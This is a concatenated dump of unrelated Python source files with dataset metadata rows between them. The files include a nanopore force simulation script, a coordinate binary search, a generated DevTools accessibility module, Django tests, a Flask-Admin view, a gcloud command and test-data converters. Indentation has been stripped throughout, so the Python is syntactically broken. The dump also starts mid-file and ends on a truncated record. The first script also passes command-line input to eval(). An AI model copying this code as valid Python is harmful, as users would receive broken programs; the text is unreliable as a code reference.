def calculate_forces(x0, pid="", clscale=10.0, refinement=True, maxcells=default_maxcells):
''' calculate forces on molecule depending on midpoint '''
t = Timer("Mesh Generation")
generate_mesh(clscale, geo_name, pid=pid, x0=x0, **params)
meshfile = "/".join([DATADIR, geo_name, "mesh", "mesh%s.xml" %pid])
geo = geo_from_name(geo_name, mesh=Mesh(meshfile), x0=x0, **params)
phys = Physics("pore_molecule", geo, **phys_params)
print "CPU Time (mesh generation):",t.stop()
print "hmin:", geo.mesh.hmin()
t = Timer('PB')
goal = lambda v : phys.Fbare(v, 2) + phys.CurrentPB(v)
pb = LinearPBGoalOriented(geo, phys, goal=goal)
pb.maxcells = maxcells
pb.marking_fraction = 0.2
pb.solve(refinement=refinement)
print "CPU Time (PB):",t.stop()
t = Timer('PNPS')
geo = pb.geo
v0 = pb.solution
#pb.visualize("solid")
pnps = PNPS(geo, phys, v0=v0)
#pnps = PNPS(geo, phys)
i = pnps.solve(visualize=False)
while i==50:
print "\nRestarting Newton iteration!"
pnps.__init__(geo, phys)
pnps.solvers["PNP"].newtondamp *= 0.8
i = pnps.solve()
print "Newton iterations:",i
print "CPU Time (PNPS):",t.stop()
pnps.print_results()
f = pnps.get_functionals()
if any(math.isnan(f[s]) for s in f):
raise Exception("NaN occured in force dict, probably caused by PETSc failure.")
return pnps.get_functionals()
def calculate_forces2D(x0, pid="", clscale=.8, refinement=True, maxcells=default_maxcells2D):
''' calculate forces on molecule depending on midpoint '''
nm = 1e-9 # by convention, nm == 1. in mesh generation script
x0 = map(lambda x:x*nm, x0)
t = Timer("Mesh Generation")
if new_mesh:
generate_mesh(clscale, geo_name2D, pid=pid, x0=x0, **params2D)
meshfile = "/".join([DATADIR, geo_name2D, "mesh", "mesh%s.xml" %pid])
geo = geo_from_name(geo_name2D, mesh=Mesh(comm, meshfile), x0=x0, **params2D)
phys = Physics("pore_molecule", geo, **phys_params)
print "CPU Time (mesh generation):",t.stop()
print "hmin:", geo.mesh.hmin()
if refinement:
t = Timer('PB')
goal = lambda v : phys.Fbare(v, 1) + phys.CurrentPB(v)
pb = LinearPBAxisymGoalOriented(geo, phys, goal=goal)
pb.maxcells = maxcells
pb.marking_fraction = 0.5
pb.solve(refinement=refinement)
print "CPU Time (PB):",t.stop()
t = Timer('PNPS')
geo = pb.geo
v0 = pb.solution
pnps = PNPSAxisym(geo, phys, v0=v0)
else:
t = Timer('PNPS')
pnps = PNPSAxisym(geo, phys)
i = pnps.solve(visualize=False)
while i==50:
print "\nRestarting Newton iteration!"
pnps.__init__(geo, phys)
pnps.solvers["PNP"].newtondamp *= 0.8
i = pnps.solve()
print "Newton iterations:",i
print "CPU Time (PNPS):",t.stop()
pnps.print_results()
#pnps.visualize()
# make forces 3D
f = pnps.get_functionals()
for s in {"Fp", "Fshear", "Fbare", "Fbarevol"}:
f[s+"2"] = f[s+"1"]
f[s+"1"] = 0.
if any(math.isnan(f[s]) for s in f):
raise Exception("NaN occured in force dict, probably caused by PETSc failure.")
return f
def calculate2D(clscale=.8, refinement=True, maxcells=10e4, pid="", **params):
if mpi4py.MPI.COMM_WORLD.Get_size() > 1:
pid = str(mpi4py.MPI.COMM_WORLD.Get_rank())
else:
pid = str(os.getpid())
globals().update(params)
IllposedNonlinearSolver.newtondamp = newtondamp
nm = 1e-9
global params2D, phys_params
params2D["rMolecule"] = r*nm
x0 = params["x0"] if "x0" in params else [0.,0.,z] # see convention
Jkey = "Javgbtm" if x0[2] > 0. else "Javgtop" # TODO: this is customized for Howorka pore
phys_params.update(dict(
Qmol = q*qq,
dnaqsdamp = dnaqsdamp,
bV0 = bV0,
))
if "bV" in params:
phys_params["bV"] = bV
forces = calculate_forces2D(x0, pid=pid, clscale=clscale, refinement=refinement, maxcells=maxcells)
result = {}
result["Fdrag"] = sum(forces[s] for s in ["Fp2", "Fshear2"])
result["Fbare"] = forces["Fbarevol2"]
result["F"] = sum(result[s] for s in ["Fbare", "Fdrag"])
result["J"] = forces[Jkey]
return result
if __name__ == "__main__":
# parse user arguments
parser = argparse.ArgumentParser()
parser.add_argument('x0', default="[0.0, 0.0, 0.0]", help='Molecule position')
parser.add_argument('pid', default="", help='Process ID for .out .msh .xml files')
parser.add_argument('clscale', default=15.0, type=float, help='Scale')
parser.add_argument('dim', default=3, type=int, help='Dimension')
args, unknown = parser.parse_known_args()
#print eval(args.x0), args.pid, args.clscale
print
print "dim =",args.dim
if args.dim==2:
print calculate_forces2D(eval(args.x0), args.pid, args.clscale)
elif args.dim==3:
print calculate_forces(eval(args.x0), args.pid, args.clscale)
| 32.713615
| 103
| 0.648536
|
5c43c46d481286e831943489942a59b6580a1784
| 1,467
|
py
|
Python
|
python/searches/binary_search_array_of_coordinates.py
|
dogunbound/weird_algorithms
|
82770af1b55a81f50a7955fd52b70d8a0ec7c43c
|
[
"MIT"
] | null | null | null |
python/searches/binary_search_array_of_coordinates.py
|
dogunbound/weird_algorithms
|
82770af1b55a81f50a7955fd52b70d8a0ec7c43c
|
[
"MIT"
] | null | null | null |
python/searches/binary_search_array_of_coordinates.py
|
dogunbound/weird_algorithms
|
82770af1b55a81f50a7955fd52b70d8a0ec7c43c
|
[
"MIT"
] | null | null | null |
# takes an array of coordinate tuples and a coordinate tuple
# searches array with a binary search for a matching coordinate tuple
# returns coordinate of location, -1 if fails
def binary_coord_search(arr, coord):
low=0
high=len(arr)-1
while low <= high:
mid = (low + high) // 2
if arr[mid] == coord:
return mid
if arr[mid][0] > coord[0]:
high = mid - 1
continue
if arr[mid][0] < coord[0]:
low = mid + 1
continue
if arr[mid][1] > coord[1]:
high = mid - 1
continue
if arr[mid][1] < coord[1]:
low = mid + 1
continue
return -1
# Example code to show how it works
import random
rArr = []
# an array of coordinate tuples of random values
MIN_MAX=1000
for i in range(MIN_MAX):
rArr.append((random.randint(-MIN_MAX, MIN_MAX),random.randint(-MIN_MAX, MIN_MAX)))
# all binary searches must be order. First order on x coord, then y
rArr=list(sorted(rArr, key=lambda x:(x[0], x[1])))
# Tests that show it works
for i in range(10):
expected = rArr[random.randint(0,MIN_MAX-1)]
index = binary_coord_search(rArr, expected)
print(expected == rArr[index])
# Failing tests
for i in range(MIN_MAX*1000):
if (i,i) not in rArr: # cuz we know in keyword works. Keyword in is a shitty algorithm, but best for unsorted lists
print(binary_coord_search(rArr, (i,i)))
break
| 27.166667
| 119
| 0.612134
|
f355f8561d55938789f567e220547c4e6a06b12f
| 15,419
|
py
|
Python
|
cdp/accessibility.py
|
auphofBSF/python-chrome-devtools-protocol
|
a5c6ecea252a0770257c7b2e08479d521ba8d12f
|
[
"MIT"
] | 42
|
2019-10-07T17:50:00.000Z
|
2022-03-28T17:56:27.000Z
|
cdp/accessibility.py
|
auphofBSF/python-chrome-devtools-protocol
|
a5c6ecea252a0770257c7b2e08479d521ba8d12f
|
[
"MIT"
] | 23
|
2019-06-09T19:56:25.000Z
|
2022-03-02T01:53:13.000Z
|
cdp/accessibility.py
|
auphofBSF/python-chrome-devtools-protocol
|
a5c6ecea252a0770257c7b2e08479d521ba8d12f
|
[
"MIT"
] | 15
|
2019-11-25T10:20:32.000Z
|
2022-03-01T21:14:56.000Z
|
# DO NOT EDIT THIS FILE!
#
# This file is generated from the CDP specification. If you need to make
# changes, edit the generator and regenerate all of the modules.
#
# CDP domain: Accessibility (experimental)
from __future__ import annotations
from cdp.util import event_class, T_JSON_DICT
from dataclasses import dataclass
import enum
import typing
from . import dom
from . import runtime
class AXNodeId(str):
'''
Unique accessibility node identifier.
'''
def to_json(self) -> str:
return self
@classmethod
def from_json(cls, json: str) -> AXNodeId:
return cls(json)
def __repr__(self):
return 'AXNodeId({})'.format(super().__repr__())
class AXValueType(enum.Enum):
'''
Enum of possible property types.
'''
BOOLEAN = "boolean"
TRISTATE = "tristate"
BOOLEAN_OR_UNDEFINED = "booleanOrUndefined"
IDREF = "idref"
IDREF_LIST = "idrefList"
INTEGER = "integer"
NODE = "node"
NODE_LIST = "nodeList"
NUMBER = "number"
STRING = "string"
COMPUTED_STRING = "computedString"
TOKEN = "token"
TOKEN_LIST = "tokenList"
DOM_RELATION = "domRelation"
ROLE = "role"
INTERNAL_ROLE = "internalRole"
VALUE_UNDEFINED = "valueUndefined"
def to_json(self) -> str:
return self.value
@classmethod
def from_json(cls, json: str) -> AXValueType:
return cls(json)
class AXValueSourceType(enum.Enum):
'''
Enum of possible property sources.
'''
ATTRIBUTE = "attribute"
IMPLICIT = "implicit"
STYLE = "style"
CONTENTS = "contents"
PLACEHOLDER = "placeholder"
RELATED_ELEMENT = "relatedElement"
def to_json(self) -> str:
return self.value
@classmethod
def from_json(cls, json: str) -> AXValueSourceType:
return cls(json)
class AXValueNativeSourceType(enum.Enum):
'''
Enum of possible native property sources (as a subtype of a particular AXValueSourceType).
'''
FIGCAPTION = "figcaption"
LABEL = "label"
LABELFOR = "labelfor"
LABELWRAPPED = "labelwrapped"
LEGEND = "legend"
TABLECAPTION = "tablecaption"
TITLE = "title"
OTHER = "other"
def to_json(self) -> str:
return self.value
@classmethod
def from_json(cls, json: str) -> AXValueNativeSourceType:
return cls(json)
@dataclass
class AXValueSource:
'''
A single source for a computed AX property.
'''
#: What type of source this is.
type_: AXValueSourceType
#: The value of this property source.
value: typing.Optional[AXValue] = None
#: The name of the relevant attribute, if any.
attribute: typing.Optional[str] = None
#: The value of the relevant attribute, if any.
attribute_value: typing.Optional[AXValue] = None
#: Whether this source is superseded by a higher priority source.
superseded: typing.Optional[bool] = None
#: The native markup source for this value, e.g. a <label> element.
native_source: typing.Optional[AXValueNativeSourceType] = None
#: The value, such as a node or node list, of the native source.
native_source_value: typing.Optional[AXValue] = None
#: Whether the value for this property is invalid.
invalid: typing.Optional[bool] = None
#: Reason for the value being invalid, if it is.
invalid_reason: typing.Optional[str] = None
def to_json(self) -> T_JSON_DICT:
json: T_JSON_DICT = dict()
json['type'] = self.type_.to_json()
if self.value is not None:
json['value'] = self.value.to_json()
if self.attribute is not None:
json['attribute'] = self.attribute
if self.attribute_value is not None:
json['attributeValue'] = self.attribute_value.to_json()
if self.superseded is not None:
json['superseded'] = self.superseded
if self.native_source is not None:
json['nativeSource'] = self.native_source.to_json()
if self.native_source_value is not None:
json['nativeSourceValue'] = self.native_source_value.to_json()
if self.invalid is not None:
json['invalid'] = self.invalid
if self.invalid_reason is not None:
json['invalidReason'] = self.invalid_reason
return json
@classmethod
def from_json(cls, json: T_JSON_DICT) -> AXValueSource:
return cls(
type_=AXValueSourceType.from_json(json['type']),
value=AXValue.from_json(json['value']) if 'value' in json else None,
attribute=str(json['attribute']) if 'attribute' in json else None,
attribute_value=AXValue.from_json(json['attributeValue']) if 'attributeValue' in json else None,
superseded=bool(json['superseded']) if 'superseded' in json else None,
native_source=AXValueNativeSourceType.from_json(json['nativeSource']) if 'nativeSource' in json else None,
native_source_value=AXValue.from_json(json['nativeSourceValue']) if 'nativeSourceValue' in json else None,
invalid=bool(json['invalid']) if 'invalid' in json else None,
invalid_reason=str(json['invalidReason']) if 'invalidReason' in json else None,
)
@dataclass
class AXRelatedNode:
#: The BackendNodeId of the related DOM node.
backend_dom_node_id: dom.BackendNodeId
#: The IDRef value provided, if any.
idref: typing.Optional[str] = None
#: The text alternative of this node in the current context.
text: typing.Optional[str] = None
def to_json(self) -> T_JSON_DICT:
json: T_JSON_DICT = dict()
json['backendDOMNodeId'] = self.backend_dom_node_id.to_json()
if self.idref is not None:
json['idref'] = self.idref
if self.text is not None:
json['text'] = self.text
return json
@classmethod
def from_json(cls, json: T_JSON_DICT) -> AXRelatedNode:
return cls(
backend_dom_node_id=dom.BackendNodeId.from_json(json['backendDOMNodeId']),
idref=str(json['idref']) if 'idref' in json else None,
text=str(json['text']) if 'text' in json else None,
)
@dataclass
class AXProperty:
#: The name of this property.
name: AXPropertyName
#: The value of this property.
value: AXValue
def to_json(self) -> T_JSON_DICT:
json: T_JSON_DICT = dict()
json['name'] = self.name.to_json()
json['value'] = self.value.to_json()
return json
@classmethod
def from_json(cls, json: T_JSON_DICT) -> AXProperty:
return cls(
name=AXPropertyName.from_json(json['name']),
value=AXValue.from_json(json['value']),
)
@dataclass
class AXValue:
'''
A single computed AX property.
'''
#: The type of this value.
type_: AXValueType
#: The computed value of this property.
value: typing.Optional[typing.Any] = None
#: One or more related nodes, if applicable.
related_nodes: typing.Optional[typing.List[AXRelatedNode]] = None
#: The sources which contributed to the computation of this property.
sources: typing.Optional[typing.List[AXValueSource]] = None
def to_json(self) -> T_JSON_DICT:
json: T_JSON_DICT = dict()
json['type'] = self.type_.to_json()
if self.value is not None:
json['value'] = self.value
if self.related_nodes is not None:
json['relatedNodes'] = [i.to_json() for i in self.related_nodes]
if self.sources is not None:
json['sources'] = [i.to_json() for i in self.sources]
return json
@classmethod
def from_json(cls, json: T_JSON_DICT) -> AXValue:
return cls(
type_=AXValueType.from_json(json['type']),
value=json['value'] if 'value' in json else None,
related_nodes=[AXRelatedNode.from_json(i) for i in json['relatedNodes']] if 'relatedNodes' in json else None,
sources=[AXValueSource.from_json(i) for i in json['sources']] if 'sources' in json else None,
)
class AXPropertyName(enum.Enum):
'''
Values of AXProperty name:
- from 'busy' to 'roledescription': states which apply to every AX node
- from 'live' to 'root': attributes which apply to nodes in live regions
- from 'autocomplete' to 'valuetext': attributes which apply to widgets
- from 'checked' to 'selected': states which apply to widgets
- from 'activedescendant' to 'owns' - relationships between elements other than parent/child/sibling.
'''
BUSY = "busy"
DISABLED = "disabled"
EDITABLE = "editable"
FOCUSABLE = "focusable"
FOCUSED = "focused"
HIDDEN = "hidden"
HIDDEN_ROOT = "hiddenRoot"
INVALID = "invalid"
KEYSHORTCUTS = "keyshortcuts"
SETTABLE = "settable"
ROLEDESCRIPTION = "roledescription"
LIVE = "live"
ATOMIC = "atomic"
RELEVANT = "relevant"
ROOT = "root"
AUTOCOMPLETE = "autocomplete"
HAS_POPUP = "hasPopup"
LEVEL = "level"
MULTISELECTABLE = "multiselectable"
ORIENTATION = "orientation"
MULTILINE = "multiline"
READONLY = "readonly"
REQUIRED = "required"
VALUEMIN = "valuemin"
VALUEMAX = "valuemax"
VALUETEXT = "valuetext"
CHECKED = "checked"
EXPANDED = "expanded"
MODAL = "modal"
PRESSED = "pressed"
SELECTED = "selected"
ACTIVEDESCENDANT = "activedescendant"
CONTROLS = "controls"
DESCRIBEDBY = "describedby"
DETAILS = "details"
ERRORMESSAGE = "errormessage"
FLOWTO = "flowto"
LABELLEDBY = "labelledby"
OWNS = "owns"
def to_json(self) -> str:
return self.value
@classmethod
def from_json(cls, json: str) -> AXPropertyName:
return cls(json)
@dataclass
class AXNode:
'''
A node in the accessibility tree.
'''
#: Unique identifier for this node.
node_id: AXNodeId
#: Whether this node is ignored for accessibility
ignored: bool
#: Collection of reasons why this node is hidden.
ignored_reasons: typing.Optional[typing.List[AXProperty]] = None
#: This ``Node``'s role, whether explicit or implicit.
role: typing.Optional[AXValue] = None
#: The accessible name for this ``Node``.
name: typing.Optional[AXValue] = None
#: The accessible description for this ``Node``.
description: typing.Optional[AXValue] = None
#: The value for this ``Node``.
value: typing.Optional[AXValue] = None
#: All other properties
properties: typing.Optional[typing.List[AXProperty]] = None
#: IDs for each of this node's child nodes.
child_ids: typing.Optional[typing.List[AXNodeId]] = None
#: The backend ID for the associated DOM node, if any.
backend_dom_node_id: typing.Optional[dom.BackendNodeId] = None
def to_json(self) -> T_JSON_DICT:
json: T_JSON_DICT = dict()
json['nodeId'] = self.node_id.to_json()
json['ignored'] = self.ignored
if self.ignored_reasons is not None:
json['ignoredReasons'] = [i.to_json() for i in self.ignored_reasons]
if self.role is not None:
json['role'] = self.role.to_json()
if self.name is not None:
json['name'] = self.name.to_json()
if self.description is not None:
json['description'] = self.description.to_json()
if self.value is not None:
json['value'] = self.value.to_json()
if self.properties is not None:
json['properties'] = [i.to_json() for i in self.properties]
if self.child_ids is not None:
json['childIds'] = [i.to_json() for i in self.child_ids]
if self.backend_dom_node_id is not None:
json['backendDOMNodeId'] = self.backend_dom_node_id.to_json()
return json
@classmethod
def from_json(cls, json: T_JSON_DICT) -> AXNode:
return cls(
node_id=AXNodeId.from_json(json['nodeId']),
ignored=bool(json['ignored']),
ignored_reasons=[AXProperty.from_json(i) for i in json['ignoredReasons']] if 'ignoredReasons' in json else None,
role=AXValue.from_json(json['role']) if 'role' in json else None,
name=AXValue.from_json(json['name']) if 'name' in json else None,
description=AXValue.from_json(json['description']) if 'description' in json else None,
value=AXValue.from_json(json['value']) if 'value' in json else None,
properties=[AXProperty.from_json(i) for i in json['properties']] if 'properties' in json else None,
child_ids=[AXNodeId.from_json(i) for i in json['childIds']] if 'childIds' in json else None,
backend_dom_node_id=dom.BackendNodeId.from_json(json['backendDOMNodeId']) if 'backendDOMNodeId' in json else None,
)
def disable() -> typing.Generator[T_JSON_DICT,T_JSON_DICT,None]:
'''
Disables the accessibility domain.
'''
cmd_dict: T_JSON_DICT = {
'method': 'Accessibility.disable',
}
json = yield cmd_dict
def enable() -> typing.Generator[T_JSON_DICT,T_JSON_DICT,None]:
'''
Enables the accessibility domain which causes ``AXNodeId``'s to remain consistent between method calls.
This turns on accessibility for the page, which can impact performance until accessibility is disabled.
'''
cmd_dict: T_JSON_DICT = {
'method': 'Accessibility.enable',
}
json = yield cmd_dict
def get_partial_ax_tree(
node_id: typing.Optional[dom.NodeId] = None,
backend_node_id: typing.Optional[dom.BackendNodeId] = None,
object_id: typing.Optional[runtime.RemoteObjectId] = None,
fetch_relatives: typing.Optional[bool] = None
) -> typing.Generator[T_JSON_DICT,T_JSON_DICT,typing.List[AXNode]]:
'''
Fetches the accessibility node and partial accessibility tree for this DOM node, if it exists.
**EXPERIMENTAL**
:param node_id: *(Optional)* Identifier of the node to get the partial accessibility tree for.
:param backend_node_id: *(Optional)* Identifier of the backend node to get the partial accessibility tree for.
:param object_id: *(Optional)* JavaScript object id of the node wrapper to get the partial accessibility tree for.
:param fetch_relatives: *(Optional)* Whether to fetch this nodes ancestors, siblings and children. Defaults to true.
:returns: The ``Accessibility.AXNode`` for this DOM node, if it exists, plus its ancestors, siblings and children, if requested.
'''
params: T_JSON_DICT = dict()
if node_id is not None:
params['nodeId'] = node_id.to_json()
if backend_node_id is not None:
params['backendNodeId'] = backend_node_id.to_json()
if object_id is not None:
params['objectId'] = object_id.to_json()
if fetch_relatives is not None:
params['fetchRelatives'] = fetch_relatives
cmd_dict: T_JSON_DICT = {
'method': 'Accessibility.getPartialAXTree',
'params': params,
}
json = yield cmd_dict
return [AXNode.from_json(i) for i in json['nodes']]
def get_full_ax_tree() -> typing.Generator[T_JSON_DICT,T_JSON_DICT,typing.List[AXNode]]:
'''
Fetches the entire accessibility tree
**EXPERIMENTAL**
:returns:
'''
cmd_dict: T_JSON_DICT = {
'method': 'Accessibility.getFullAXTree',
}
json = yield cmd_dict
return [AXNode.from_json(i) for i in json['nodes']]
| 33.665939
| 132
| 0.652572
|
97bbbd724296fa99ba54f2b37df53ff8d19c9766
| 2,181
|
py
|
Python
|
infinity/apps/base/test.py
|
ra101/Django-Infinity
|
9fd17c3c27e1d9f4c1796007b7dc053857edd294
|
[
"MIT"
] | null | null | null |
infinity/apps/base/test.py
|
ra101/Django-Infinity
|
9fd17c3c27e1d9f4c1796007b7dc053857edd294
|
[
"MIT"
] | null | null | null |
infinity/apps/base/test.py
|
ra101/Django-Infinity
|
9fd17c3c27e1d9f4c1796007b7dc053857edd294
|
[
"MIT"
] | null | null | null |
from uuid import uuid4
from django.urls import reverse
from django.test import tag
from rest_framework import status
from rest_framework.test import APITestCase
from constance.test import override_config as override_live_settings
from infinity.constants import LiveDemoInitialConfig
@tag("home")
class HomeTests(APITestCase):
"""
Test Case(s) for /home.html
"""
request = lambda self: self.client.get(reverse("home"))
def test_successful(self):
"""Successfully ping at the right address"""
response = self.request()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.content, b"Hello World")
@tag("live-url-demo")
class LiveDemoTests(APITestCase):
"""
Test Case(s) for /live_settings/<str:live_url_endpoint>/
"""
request = lambda self, kwargs: self.client.get(
reverse("live-url-demo", kwargs=kwargs)
)
TEST_KEY = str(uuid4())
TEST_VALUE = str(uuid4())
TEST_ENDPOINT = str(uuid4())
def test_default_live_settings(self):
"""Successfully ping at the right address"""
response = self.request(
kwargs={"live_url_endpoint": LiveDemoInitialConfig.ENDPOINT}
)
response_json = response.json()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(
response_json, {LiveDemoInitialConfig.KEY: LiveDemoInitialConfig.VALUE}
)
@override_live_settings(
LIVE_KEY=TEST_KEY, LIVE_VALUE=TEST_VALUE, LIVE_URL_ENDPOINT=TEST_ENDPOINT
)
def test_update_live_settings(self):
"""Successfully ping at the right address"""
response = self.request(kwargs={"live_url_endpoint": self.TEST_ENDPOINT})
response_json = response.json()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response_json, {self.TEST_KEY: self.TEST_VALUE})
def test_invalid_url_endpoint(self):
"""If Incorrect <URL param> is sent"""
response = self.request(kwargs={"live_url_endpoint": str(uuid4())})
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
| 28.697368
| 83
| 0.694177
|
5bb219bfbf688e249c1129362ecb781b166c9a37
| 523
|
py
|
Python
|
widgets/create_project/create_project.py
|
cnralux/qgis-zoa-plugin
|
f25846ee2d9d563da5e201172c2fb5c220b2952b
|
[
"MIT"
] | null | null | null |
widgets/create_project/create_project.py
|
cnralux/qgis-zoa-plugin
|
f25846ee2d9d563da5e201172c2fb5c220b2952b
|
[
"MIT"
] | null | null | null |
widgets/create_project/create_project.py
|
cnralux/qgis-zoa-plugin
|
f25846ee2d9d563da5e201172c2fb5c220b2952b
|
[
"MIT"
] | null | null | null |
'''
Created on 17 sept. 2015
@author: arxit
'''
from __future__ import absolute_import
from builtins import object
import os
from .create_project_dialog import CreateProjectDialog
class CreateProject(object):
'''
Main class for the create project widget
'''
def __init__(self):
'''
Constructor
'''
self.dlg = CreateProjectDialog()
def run(self):
'''
Runs the widget
'''
self.dlg.clear()
self.dlg.show()
| 16.34375
| 54
| 0.57935
|
6f40039ed95c75b2dfde9d4f34ed9813c9f0b13a
| 1,989
|
py
|
Python
|
mac/google-cloud-sdk/lib/surface/compute/sole_tenancy/node_groups/describe.py
|
bopopescu/cndw
|
ee432efef88a4351b355f3d6d5350defc7f4246b
|
[
"Apache-2.0"
] | 2
|
2019-11-10T09:17:07.000Z
|
2019-12-18T13:44:08.000Z
|
mac/google-cloud-sdk/lib/surface/compute/sole_tenancy/node_groups/describe.py
|
bopopescu/cndw
|
ee432efef88a4351b355f3d6d5350defc7f4246b
|
[
"Apache-2.0"
] | 4
|
2020-07-21T12:51:46.000Z
|
2022-01-22T10:29:25.000Z
|
mac/google-cloud-sdk/lib/surface/compute/sole_tenancy/node_groups/describe.py
|
bopopescu/cndw
|
ee432efef88a4351b355f3d6d5350defc7f4246b
|
[
"Apache-2.0"
] | 1
|
2020-07-25T18:17:57.000Z
|
2020-07-25T18:17:57.000Z
|
# -*- coding: utf-8 -*- #
# Copyright 2018 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Describe node group command."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.api_lib.compute import base_classes
from googlecloudsdk.calliope import base
from googlecloudsdk.command_lib.compute import flags as compute_flags
from googlecloudsdk.command_lib.compute.sole_tenancy.node_groups import flags
class Describe(base.DescribeCommand):
"""Describe a Compute Engine node group."""
detailed_help = {
'brief': 'Describe a Compute Engine node group.',
'EXAMPLES': """
To describe a node group, run:
$ {command} my-node-group
"""
}
@staticmethod
def Args(parser):
flags.MakeNodeGroupArg().AddArgument(parser)
def Run(self, args):
holder = base_classes.ComputeApiHolder(self.ReleaseTrack())
client = holder.client
node_group_ref = flags.MakeNodeGroupArg().ResolveAsResource(
args, holder.resources,
scope_lister=compute_flags.GetDefaultScopeLister(holder.client))
messages = holder.client.messages
request = messages.ComputeNodeGroupsGetRequest(
nodeGroup=node_group_ref.Name(),
project=node_group_ref.project,
zone=node_group_ref.zone)
service = holder.client.apitools_client.nodeGroups
return client.MakeRequests([(service, 'Get', request)])[0]
| 33.711864
| 77
| 0.741076
|
933a4e15875e962de6bfcb218fea9e06912eec2c
| 4,042
|
py
|
Python
|
seldom/testdata/conversion.py
|
defnngj/pyse
|
6dbf080f74440cc10a7d44e87bee0e8cbb4362e2
|
[
"Apache-2.0"
] | 250
|
2015-09-10T09:25:02.000Z
|
2019-11-16T12:03:44.000Z
|
seldom/testdata/conversion.py
|
ooceann/seldom
|
2e2b8855c305e8b8aa16c852517385814e253720
|
[
"Apache-2.0"
] | 13
|
2016-04-22T08:03:04.000Z
|
2019-06-03T03:44:54.000Z
|
seldom/testdata/conversion.py
|
ooceann/seldom
|
2e2b8855c305e8b8aa16c852517385814e253720
|
[
"Apache-2.0"
] | 166
|
2015-07-16T02:51:58.000Z
|
2019-11-15T05:12:30.000Z
|
"""
Data type conversion of different files
"""
import csv
import json
import yaml
import codecs
from itertools import islice
try:
from openpyxl import load_workbook
except ModuleNotFoundError:
raise ModuleNotFoundError("Please install the library. https://pypi.org/project/openpyxl/")
def _check_data(list_data: list) -> list:
"""
Checking test data format.
:param list_data:
:return:
"""
if isinstance(list_data, list) is False:
raise TypeError("The data format is not `list`.")
if len(list_data) == 0:
raise ValueError("The data format cannot be `[]`.")
if isinstance(list_data[0], dict):
test_data = []
for data in list_data:
line = []
for d in data.values():
line.append(d)
test_data.append(line)
return test_data
else:
return list_data
def csv_to_list(file=None, line=1):
"""
Convert CSV file data to list
:param file: Path to file
:param line: Start line of read data
:return: list data
@data("data.csv", line=1)
def test_login(self, username, password):
print(username)
print(password)
"""
if file is None:
raise FileExistsError("Please specify the CSV file to convert.")
table_data = []
csv_data = csv.reader(codecs.open(file, 'r', 'utf_8_sig'))
for line in islice(csv_data, line - 1, None):
table_data.append(line)
return table_data
def excel_to_list(file=None, sheet="Sheet1", line=1):
"""
Convert Excel file data to list
:param file: Path to file
:param sheet: excel sheet, default name is Sheet1
:param line: Start line of read data
:return: list data
@data("data.xlsx", sheet="Sheet1", line=1)
def test_login(self, username, password):
print(username)
print(password)
"""
if file is None:
raise FileExistsError("Please specify the Excel file to convert.")
excel_table = load_workbook(file)
sheet = excel_table[sheet]
table_data = []
for line in sheet.iter_rows(line, sheet.max_row):
line_data = []
for field in line:
line_data.append(field.value)
table_data.append(line_data)
return table_data
def json_to_list(file, key=None):
"""
Convert JSON file data to list
:param file: Path to file
:param key: Specifies the key for the dictionary
:return: list data
@data("data.json", key="login")
def test_login(self, username, password):
print(username)
print(password)
"""
if file is None:
raise FileExistsError("Please specify the JSON file to convert.")
if key is None:
with open(file, "r", encoding="utf-8") as f:
data = json.load(f)
list_data = _check_data(data)
else:
with open(file, "r", encoding="utf-8") as f:
try:
data = json.load(f)[key]
list_data = _check_data(data)
except KeyError:
raise ValueError("Check the test data, no '{}'".format(key))
return list_data
def yaml_to_list(file, key=None):
"""
Convert JSON file data to list
:param file: Path to file
:param key: Specifies the key for the dictionary
:return: list data
@data("data.yaml", key="login")
def test_login(self, username, password):
print(username)
print(password)
"""
if file is None:
raise FileExistsError("Please specify the YAML file to convert.")
if key is None:
with open(file, "r", encoding="utf-8") as f:
data = yaml.load(f, Loader=yaml.FullLoader)
list_data = _check_data(data)
else:
with open(file, "r", encoding="utf-8") as f:
try:
data = yaml.load(f, Loader=yaml.FullLoader)[key]
list_data = _check_data(data)
except KeyError:
raise ValueError("Check the test data, no '{}'".format(key))
return list_data
| 27.496599
| 95
| 0.60762
|
2db1b097689c074c5e4d6d75c9eaeb916e740103
| 746
|
py
|
Python
|
app/controllers/admin/known_ip_model_view.py
|
politeauthority/simple-honey
|
a875773c3299044b113c339203c909b6c4391fb4
|
[
"MIT"
] | null | null | null |
app/controllers/admin/known_ip_model_view.py
|
politeauthority/simple-honey
|
a875773c3299044b113c339203c909b6c4391fb4
|
[
"MIT"
] | 1
|
2021-06-01T21:43:04.000Z
|
2021-06-01T21:43:04.000Z
|
app/controllers/admin/known_ip_model_view.py
|
politeauthority/simple-honey
|
a875773c3299044b113c339203c909b6c4391fb4
|
[
"MIT"
] | null | null | null |
"""Known Ip Model View
"""
from flask_admin.form import SecureForm
from app.controllers.admin.base_model_view import BaseModelView
from app.utilities import admin_tools
class KnownIpModelView(BaseModelView):
"""
View Class for KnownIps
"""
page_size = 25
column_type_formatters = admin_tools.default_column_formatters()
column_list = ['ip', 'name', 'last_seen', 'ts_created']
column_searchable_list = ['ip', 'name', 'last_seen', 'ts_created']
column_exclude_list = ['ts_updated', 'notes']
column_default_sort = ('last_seen', True)
form_base_class = SecureForm
form_excluded_columns = ['ts_created', 'ts_updated', 'requests']
# End File: simple-honey/app/controllers/admin/known_ip_model_view.py
| 28.692308
| 70
| 0.730563
|
105a5f8954f1795597bf87fa4e817dcc89a4a5ce
| 711
|
py
|
Python
|
server/config.py
|
mbucknell/ngwmn-ui
|
7d65053a330dc94ec0dbbea251ab55ac7d6ed376
|
[
"CC0-1.0"
] | null | null | null |
server/config.py
|
mbucknell/ngwmn-ui
|
7d65053a330dc94ec0dbbea251ab55ac7d6ed376
|
[
"CC0-1.0"
] | null | null | null |
server/config.py
|
mbucknell/ngwmn-ui
|
